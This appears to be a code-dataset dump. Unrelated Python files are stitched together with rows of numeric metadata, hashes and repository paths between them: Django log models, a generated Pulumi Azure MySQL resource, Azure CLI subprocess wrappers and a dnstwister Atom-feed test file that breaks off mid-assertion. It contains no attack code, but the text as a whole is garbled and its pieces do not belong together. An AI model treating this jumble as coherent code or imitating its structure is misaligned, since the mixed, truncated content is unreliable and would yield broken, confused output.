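# Minimal usage sketch (hypothetical values; assumes a "loginfo:detail"
# URL pattern exists, as required by get_absolute_url above):
#
#     entry = LogInfo(aims_id="A-001", host_id="H-01", app_id="APP-01",
#                     app_name="demo", system_status="OK",
#                     log_agent_name="agent-1")
#     entry.publish()  # stamps published_date and saves the row
#     url = entry.get_absolute_url()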
class HostInfo(models.Model):
host_id = models.CharField(max_length=100)
host_name = models.CharField(max_length=100)
host_ip = models.CharField(max_length=100)
host_desc = models.CharField(max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
class AppInfo(models.Model):
app_id = models.CharField(max_length=100)
app_name = models.CharField(max_length=100)
app_desc = models.CharField(max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
class MonthlyTranInfo(models.Model):
log_mid = models.CharField(max_length=100)
tran_w1_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w1_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w1_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w1_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w2_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w2_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w2_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w2_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w3_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w3_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w3_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w3_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w4_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w4_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w4_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w4_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w5_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w5_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w5_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w5_errratio = models.CharField(blank=True, null=True, max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
class WeeklyTranInfo(models.Model):
log_mid = models.CharField(max_length=100)
tran_d1_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d1_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d1_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d1_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d2_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d2_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d2_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d2_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d3_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d3_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d3_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d3_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d4_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d4_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d4_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d4_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d5_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d5_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d5_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d5_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d6_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d6_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d6_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d6_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d7_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d7_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d7_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d7_errratio = models.CharField(blank=True, null=True, max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
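# Illustrative usage sketch (not part of the models file above): creating and
# querying HostInfo through the standard Django ORM. Shown as comments because
# live queries do not belong at import time in a models module; all values and
# the variable names are placeholders, only the model and field names come
# from the file itself.
#
#   host = HostInfo.objects.create(
#       host_id="H001", host_name="web01", host_ip="10.0.0.1",
#       host_desc="primary web node", use_yn="Y")
#   active_count = HostInfo.objects.filter(use_yn="Y").count()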
| 54.418033
| 86
| 0.758096
| 985
| 6,639
| 4.880203
| 0.08731
| 0.146037
| 0.19222
| 0.226337
| 0.897857
| 0.891408
| 0.870605
| 0.841689
| 0.841689
| 0.841689
| 0
| 0.051995
| 0.128031
| 6,639
| 121
| 87
| 54.867769
| 0.778373
| 0.003615
| 0
| 0.201923
| 0
| 0
| 0.003327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028846
| false
| 0
| 0.028846
| 0.019231
| 0.980769
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
67698258d58d0a1918ac97b7476911f69f73bf86
| 17,613
|
py
|
Python
|
sdk/python/pulumi_azure/mysql/flexible_server_configuration.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/mysql/flexible_server_configuration.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/mysql/flexible_server_configuration.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['FlexibleServerConfigurationArgs', 'FlexibleServerConfiguration']
@pulumi.input_type
class FlexibleServerConfigurationArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
server_name: pulumi.Input[str],
value: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FlexibleServerConfiguration resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "value", value)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _FlexibleServerConfigurationState:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering FlexibleServerConfiguration resources.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
class FlexibleServerConfiguration(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Sets a MySQL Flexible Server Configuration value on a MySQL Flexible Server.
## Disclaimers
> **Note:** Since this resource is provisioned by default, the Azure Provider will not check for the presence of an existing resource prior to attempting to create it.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_flexible_server = azure.mysql.FlexibleServer("exampleFlexibleServer",
resource_group_name=azurerm_resource_group["test"]["name"],
location=azurerm_resource_group["test"]["location"],
administrator_login="adminTerraform",
administrator_password="H@Sh1CoR3!",
sku_name="GP_Standard_D2ds_v4")
example_flexible_server_configuration = azure.mysql.FlexibleServerConfiguration("exampleFlexibleServerConfiguration",
resource_group_name=example_resource_group.name,
server_name=azurerm_mysql_server["example"]["name"],
value="600")
```
## Import
MySQL Flexible Server Configurations can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mysql/flexibleServerConfiguration:FlexibleServerConfiguration interactive_timeout /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforMySQL/flexibleServers/flexibleServer1/configurations/interactive_timeout
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FlexibleServerConfigurationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Sets a MySQL Flexible Server Configuration value on a MySQL Flexible Server.
## Disclaimers
> **Note:** Since this resource is provisioned by default, the Azure Provider will not check for the presence of an existing resource prior to attempting to create it.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_flexible_server = azure.mysql.FlexibleServer("exampleFlexibleServer",
resource_group_name=azurerm_resource_group["test"]["name"],
location=azurerm_resource_group["test"]["location"],
administrator_login="adminTerraform",
administrator_password="H@Sh1CoR3!",
sku_name="GP_Standard_D2ds_v4")
example_flexible_server_configuration = azure.mysql.FlexibleServerConfiguration("exampleFlexibleServerConfiguration",
resource_group_name=example_resource_group.name,
server_name=azurerm_mysql_server["example"]["name"],
value="600")
```
## Import
MySQL Flexible Server Configurations can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mysql/flexibleServerConfiguration:FlexibleServerConfiguration interactive_timeout /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforMySQL/flexibleServers/flexibleServer1/configurations/interactive_timeout
```
:param str resource_name: The name of the resource.
:param FlexibleServerConfigurationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FlexibleServerConfigurationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FlexibleServerConfigurationArgs.__new__(FlexibleServerConfigurationArgs)
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_name is None and not opts.urn:
raise TypeError("Missing required property 'server_name'")
__props__.__dict__["server_name"] = server_name
if value is None and not opts.urn:
raise TypeError("Missing required property 'value'")
__props__.__dict__["value"] = value
super(FlexibleServerConfiguration, __self__).__init__(
'azure:mysql/flexibleServerConfiguration:FlexibleServerConfiguration',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'FlexibleServerConfiguration':
"""
Get an existing FlexibleServerConfiguration resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FlexibleServerConfigurationState.__new__(_FlexibleServerConfigurationState)
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["server_name"] = server_name
__props__.__dict__["value"] = value
return FlexibleServerConfiguration(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@property
@pulumi.getter
def value(self) -> pulumi.Output[str]:
"""
Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
return pulumi.get(self, "value")
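# Illustrative sketch (not part of the generated SDK file above): adopting an
# existing configuration into a program via the static get() method defined on
# FlexibleServerConfiguration. The id follows the format shown in the Import
# section of the class docstring; the subscription, group, and server names
# are placeholders.
#
#   existing = FlexibleServerConfiguration.get(
#       "interactive_timeout",
#       id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1"
#          "/providers/Microsoft.DBforMySQL/flexibleServers/flexibleServer1"
#          "/configurations/interactive_timeout")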
| 49.754237
| 284
| 0.68069
| 2,097
| 17,613
| 5.528851
| 0.100143
| 0.053131
| 0.065206
| 0.053131
| 0.827411
| 0.809039
| 0.802657
| 0.774452
| 0.767983
| 0.754614
| 0
| 0.007158
| 0.230625
| 17,613
| 353
| 285
| 49.895184
| 0.848424
| 0.475842
| 0
| 0.602273
| 1
| 0
| 0.104003
| 0.020922
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153409
| false
| 0.005682
| 0.028409
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67a3d4ae1c7b0cfeee8c426acb4eb96c8114ee10
| 157
|
py
|
Python
|
keydecomposer/__init__.py
|
DocSchlock/KeyDecomposer
|
581422e49e5eff2853f4f43b2e2c675cd40da664
|
[
"BSD-3-Clause"
] | null | null | null |
keydecomposer/__init__.py
|
DocSchlock/KeyDecomposer
|
581422e49e5eff2853f4f43b2e2c675cd40da664
|
[
"BSD-3-Clause"
] | null | null | null |
keydecomposer/__init__.py
|
DocSchlock/KeyDecomposer
|
581422e49e5eff2853f4f43b2e2c675cd40da664
|
[
"BSD-3-Clause"
] | null | null | null |
from .keydecompose import decompose_frame, recur_weights, generate_weighted_series
__all__ = ['decompose_frame','recur_weights','generate_weighted_series']
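# Illustrative note (not part of the package file above): the re-export lets
# callers import the three functions from the package root,
#
#   from keydecomposer import decompose_frame, recur_weights, generate_weighted_series
#
# instead of reaching into the keydecompose submodule, and __all__ pins
# `from keydecomposer import *` to the same three names.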
| 39.25
| 82
| 0.847134
| 18
| 157
| 6.722222
| 0.611111
| 0.231405
| 0.31405
| 0.429752
| 0.793388
| 0.793388
| 0.793388
| 0
| 0
| 0
| 0
| 0
| 0.063694
| 157
| 3
| 83
| 52.333333
| 0.823129
| 0
| 0
| 0
| 1
| 0
| 0.33121
| 0.152866
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
67a549aceb79ea0d1f5543bae9d7505cb1a9f411
| 2,908
|
py
|
Python
|
test/pyaz/ams/account_filter/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/ams/account_filter/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/ams/account_filter/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
# Thin wrappers over the `az ams account-filter` CLI: each function builds the
# argument string from its own local variables, echoes and runs the command,
# and returns the parsed JSON from stdout, raising with stderr on failure.
import json, subprocess
from ...pyaz_utils import get_cli_name, get_params


def create(account_name, resource_group, name, start_timestamp=None, end_timestamp=None, presentation_window_duration=None, live_backoff_duration=None, timescale=None, force_end_timestamp=None, bitrate=None, first_quality=None, tracks=None):
    params = get_params(locals())
    command = "az ams account-filter create " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)


def show(resource_group, account_name, name):
    params = get_params(locals())
    command = "az ams account-filter show " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)


def list(resource_group, account_name):
    params = get_params(locals())
    command = "az ams account-filter list " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)


def delete(resource_group, account_name, name):
    params = get_params(locals())
    command = "az ams account-filter delete " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)


def update(resource_group, account_name, name, start_timestamp=None, end_timestamp=None, presentation_window_duration=None, live_backoff_duration=None, timescale=None, bitrate=None, first_quality=None, tracks=None, force_end_timestamp=None, set=None, add=None, remove=None, force_string=None):
    params = get_params(locals())
    command = "az ams account-filter update " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
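# Illustrative usage sketch (not part of the wrapper module above): each
# function shells out to the Azure CLI and returns the parsed JSON on success.
# The resource-group and account names below are placeholders.
#
#   filters = list(resource_group="my-rg", account_name="myamsaccount")
#   detail = show(resource_group="my-rg", account_name="myamsaccount", name="filter1")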
| 39.297297
| 293
| 0.689133
| 364
| 2,908
| 5.401099
| 0.164835
| 0.071211
| 0.050865
| 0.053408
| 0.90234
| 0.870804
| 0.870804
| 0.870804
| 0.833164
| 0.833164
| 0
| 0.004288
| 0.198074
| 2,908
| 73
| 294
| 39.835616
| 0.838765
| 0
| 0
| 0.820896
| 0
| 0
| 0.065681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0
| 0.179104
| 0.223881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67c1a3dcc8915fc7fd6555a1d5521205b59ea28d
| 16,833
|
py
|
Python
|
tests/test_atom.py
|
jkohrman/dnstwister
|
ff668f139a5d49665fd555340be2b63b6c2a91e7
|
[
"Unlicense"
] | null | null | null |
tests/test_atom.py
|
jkohrman/dnstwister
|
ff668f139a5d49665fd555340be2b63b6c2a91e7
|
[
"Unlicense"
] | null | null | null |
tests/test_atom.py
|
jkohrman/dnstwister
|
ff668f139a5d49665fd555340be2b63b6c2a91e7
|
[
"Unlicense"
] | null | null | null |
"""Tests of the atom behaviour."""
# -*- coding: UTF-8 -*-
import base64
import datetime
import textwrap
import unittest
import pytest
import flask.ext.webtest
import mock
import webtest.app
import dnstwister
from dnstwister import tools
import patches
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_unicode_atom(webapp):
"""Unicode should just work too, this is just a sanity check."""
unicode_domain = 'xn--plnt-1na.com'.decode('idna') # 'plànt.com'
get_path = tools.encode_domain(unicode_domain)
with pytest.raises(webtest.app.AppError) as err:
webapp.get('/atom/{}'.format(get_path))
assert '404 NOT FOUND' in err.value.message
assert 'New RSS feed generation currently disabled.' in err.value.message
def test_atom_feeds_validate_domain(webapp):
"""Test that the validation checks for valid domains before creating
feeds.
"""
with pytest.raises(webtest.app.AppError) as err:
webapp.get('/atom/324u82938798swefsdf')
assert '400 BAD REQUEST' in err.value.message
# TODO: Update to pytest-style.
class TestAtom(unittest.TestCase):
"""Tests of the atom feed behaviour."""
def setUp(self):
"""Set up the app for testing."""
# Create a webtest Test App for use
self.app = flask.ext.webtest.TestApp(dnstwister.app)
# Clear the webapp cache
dnstwister.cache.clear()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_new_feed(self):
"""Tests the registration of a new feed - currently disabled."""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = 'www.example.com'
# A feed is registered by trying to load it (and it not already being
# registered).
with pytest.raises(webtest.app.AppError) as err:
res = self.app.get('/atom/{}'.format(base64.b64encode(domain))).follow()
assert '404 NOT FOUND' in err.value.message
assert 'New RSS feed generation currently disabled.' in err.value.message
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_deleted_items_appear_in_rss(self):
"""Tests that deleted items in delta reports appear in the RSS.
"""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = 'www.example.com'
repository.register_domain(domain)
# We can calculate a delta though.
update_date = datetime.datetime(2016, 2, 28, 11, 10, 34)
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [('wwwexa.mple.com', '127.0.0.1', '127.0.0.2')],
'deleted': ['www.eeexample.com', 'www2.example.com.au'],
},
update_date
)
# Clear the webapp cache
dnstwister.cache.clear()
res = self.app.get('/atom/{}'.format(base64.b64encode(domain))).follow()
assert str(res) == textwrap.dedent("""
Response: 200 OK
Content-Type: application/atom+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="text">dnstwister report for www.example.com</title>
<id>http://localhost:80/atom/7777772e6578616d706c652e636f6d</id>
<updated>2016-02-28T11:10:34Z</updated>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<link href="http://localhost:80/atom/7777772e6578616d706c652e636f6d" rel="self" />
<generator>Werkzeug</generator>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">NEW: www.examp1e.com</title>
<id>new:www.examp1e.com:127.0.0.1:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1</h1>
<a href="https://dnstwister.report/analyse/7777772e6578616d7031652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">UPDATED: wwwexa.mple.com</title>
